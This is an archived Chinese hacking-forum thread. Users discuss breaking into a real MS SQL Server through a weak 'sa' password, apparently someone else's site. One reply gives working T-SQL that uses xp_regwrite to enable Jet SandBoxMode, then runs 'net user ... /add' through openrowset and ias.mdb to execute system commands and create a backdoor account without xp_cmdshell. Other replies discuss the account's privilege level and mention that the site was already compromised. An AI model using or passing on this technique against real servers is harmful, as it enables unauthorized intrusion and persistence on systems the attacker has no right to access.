标题:
[讨论]sa的老问题 发图讨论之前的老文章方法
[打印本页]
作者:
valen886
时间:
2008-7-24 17:20
标题:
[讨论]sa的老问题 发图讨论之前的老文章方法
[讨论]sa的老问题 发图讨论之前的老文章方法
议题作者:小猪!
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
今天遇到个sa的弱口令搞了下,下面的图是搞的结果!
得到的结果是cmd用不了,上传也用不了!分离器命令不行!还有就是今天看到有个朋友用分离器执行了命令,然后3389SHIFT5次也不行!
不知道大峡们有什么好的方法没?
都大.jpg
(1.6 MB)
2007-12-3 16:16
未命名.jpg
(312 KB)
2007-12-3 16:16
的命名.jpg
(872 KB)
2007-12-3 16:16
未都大名.jpg
(1.35 MB)
2007-12-3 16:16
未命名22.jpg
(1.73 MB)
2007-12-3 16:16
帖子3 精华
0
积分16 阅读权限40 在线时间1 小时 注册时间2007-11-12 最后登录2008-5-10
查看详细资料
TOP
您知道您年薪应是多少?
沉渊
晶莹剔透§烈日灼然
作者:
paul2014
时间:
2008-7-24 17:20
权限问题,貌似你这根本就不是saDreamless world……
帖子25 精华
0
积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30
查看详细资料
TOP
爱要怎么说出口
逗号
晶莹剔透§烈日灼然
作者:
jacky6636
时间:
2008-7-24 17:20
先 select user 一下,看看是不是 dbo 要是的话,就开启沙盘模式搞他
不用xp_cmdshell 执行命令
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user xxxxx xxxx /add")')
帖子35 精华
0
积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22
查看详细资料
TOP
让女孩一夜变的更有女人味
逗号
晶莹剔透§烈日灼然
作者:
金羊
时间:
2008-7-24 17:21
实践证明,你的那个用户为GUEST 权限
不过,好像已经有人拿下了这个站。鬼知道是哪里的黑客~!
帖子35 精华
0
积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22
查看详细资料
TOP
charley008
晶莹剔透§烈日灼然
作者:
小乖
时间:
2008-7-24 17:21
沙盒模式在2003下也有用吗?
帖子16 精华
0
积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7
查看详细资料
TOP
让女孩一夜变的更有女人味
wolfluxay
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2